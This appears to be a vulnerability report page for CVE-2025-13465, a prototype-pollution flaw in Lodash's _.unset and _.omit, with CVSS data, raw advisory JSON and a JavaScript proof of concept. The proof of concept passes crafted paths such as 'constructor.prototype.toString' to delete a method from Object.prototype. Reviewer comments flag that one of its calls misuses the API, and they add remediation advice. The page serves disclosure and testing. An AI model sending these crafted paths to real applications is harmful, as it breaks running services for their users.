Security Vulnerability Report
CVE-2025-13465 CVSS 5.3 MEDIUM

CVE-2025-13465

Published: 2026-01-21 20:16:05
Last Modified: 2026-02-17 17:10:08
Source: ce714d77-add3-4f53-aff5-83d477b104bb

Description

Lodash versions 4.0.0 through 4.17.22 are vulnerable to prototype pollution in the _.unset and _.omit functions. An attacker can pass crafted paths that cause Lodash to delete methods from global prototypes. The issue permits deletion of properties but does not allow overwriting their original behavior. This issue is patched in 4.17.23.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:lodash:lodash:*:*:*:*:*:node.js:*:* - VULNERABLE
Lodash >= 4.0.0
Lodash <= 4.17.22

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-13465 PoC - Prototype Pollution in Lodash _.unset and _.omit
// Affected versions: 4.0.0 to 4.17.22
//
// Reviewer notes:
//  - This script deletes a method from Object.prototype for the remaining
//    lifetime of the Node process and never restores it, so run it only in a
//    throwaway process with a disposable install of the affected version.
//  - The defect under test is that _.unset and _.omit accept a caller-supplied
//    path and delete whatever property it resolves to, even when the path
//    leaves the target object and reaches a shared prototype. The remediation
//    is the patched release (>= 4.17.23); until then, applications must not
//    forward user-controlled path strings to these helpers.
const _ = require('lodash');

console.log('[*] CVE-2025-13465 Prototype Pollution PoC');
console.log('[*] Target: Lodash <= 4.17.22\n');

// Check if toString exists before attack
// Baseline: records that the inherited method is present before any call.
console.log('[1] Checking Object.prototype.toString before attack...');
console.log(' typeof Object.prototype.toString:', typeof Object.prototype.toString);

// Method 1: Using _.unset with '__proto__' path
// NOTE(review): _.unset takes (object, path); the third argument is not part
// of the API and is ignored, so this call should do no more than attempt to
// delete an own '__proto__' key on the empty object. Expect "deleted: false"
// here and the "[UNEXPECTED]" branch in step [3] regardless of version — do
// not read that output as evidence that the installed version is patched.
console.log('\n[2] Exploiting _.unset with crafted path...');
const unsetResult = _.unset({}, '__proto__', 'toString');
console.log(' _.unset result:', unsetResult);
console.log(' Object.prototype.toString deleted:', Object.prototype.toString === undefined);

// Verify the attack effect
// A TypeError here means the inherited toString is gone for every plain object
// in this process, not just for testObj.
console.log('\n[3] Verifying attack effect...');
try {
  const testObj = {name: 'test'};
  testObj.toString();
  console.log(' [UNEXPECTED] toString still exists');
} catch (e) {
  console.log(' [SUCCESS] toString was deleted, error:', e.message);
}

// Method 2: Using _.omit with nested constructor path
// This is the call that exercises the reported defect: 'constructor.prototype'
// leads from a plain object to Object.prototype, so the final segment is
// deleted from the shared prototype rather than from `target`. (That the path
// is resolved through inherited properties is inferred from the advisory text;
// confirm against the lodash source for the version under test.)
console.log('\n[4] Exploiting _.omit with constructor path...');
const maliciousPath = 'constructor.prototype.toString';
const target = {key: 'value'};
const result = _.omit(target, [maliciousPath]);
console.log(' _.omit result:', result);

// Demonstrate denial of service impact
// `data` is created after the _.omit call and was never passed to lodash; if
// its toString() call fails, the damage is process-wide and not limited to the
// object that was passed to _.omit.
console.log('\n[5] Demonstrating DoS impact...');
const data = {items: [1, 2, 3]};
try {
  console.log(' Before: data.toString():', data.toString());
} catch (e) {
  console.log(' [VULNERABLE] Cannot call toString():', e.message);
}

console.log('\n[*] PoC completed. Target is vulnerable if toString was deleted.');
// Beyond upgrading: reject path inputs containing '__proto__', 'constructor'
// or 'prototype' segments before they reach _.unset/_.omit, and consider
// freezing Object.prototype at process startup, which turns this deletion
// into a no-op.
console.log('[*] Recommendation: Upgrade to Lodash >= 4.17.23');

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13465", "sourceIdentifier": "ce714d77-add3-4f53-aff5-83d477b104bb", "published": "2026-01-21T20:16:05.250", "lastModified": "2026-02-17T17:10:07.520", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Lodash versions 4.0.0 through 4.17.22 are vulnerable to prototype pollution in the _.unset and _.omit functions. An attacker can pass crafted paths which cause Lodash to delete methods from global prototypes.\n\nThe issue permits deletion of properties but does not allow overwriting their original behavior.\n\nThis issue is patched on 4.17.23"}, {"lang": "es", "value": "Las versiones de Lodash 4.0.0 a 4.17.22 son vulnerables a la contaminación de prototipos en las funciones _.unset y _.omit. Un atacante puede pasar rutas manipuladas que hacen que Lodash elimine métodos de prototipos globales.\n\nEl problema permite la eliminación de propiedades, pero no permite sobrescribir su comportamiento original.\n\nEste problema está parcheado en 4.17.23"}], "metrics": {"cvssMetricV40": [{"source": "ce714d77-add3-4f53-aff5-83d477b104bb", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:H/SI:H/SA:H/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", 
"modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "ce714d77-add3-4f53-aff5-83d477b104bb", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1321"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lodash:lodash:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.17.23", "matchCriteriaId": "0F9E287B-784B-472D-9FA2-1469E4C8A810"}]}]}], "references": [{"url": "https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg", "source": "ce714d77-add3-4f53-aff5-83d477b104bb", "tags": ["Vendor Advisory"]}]}}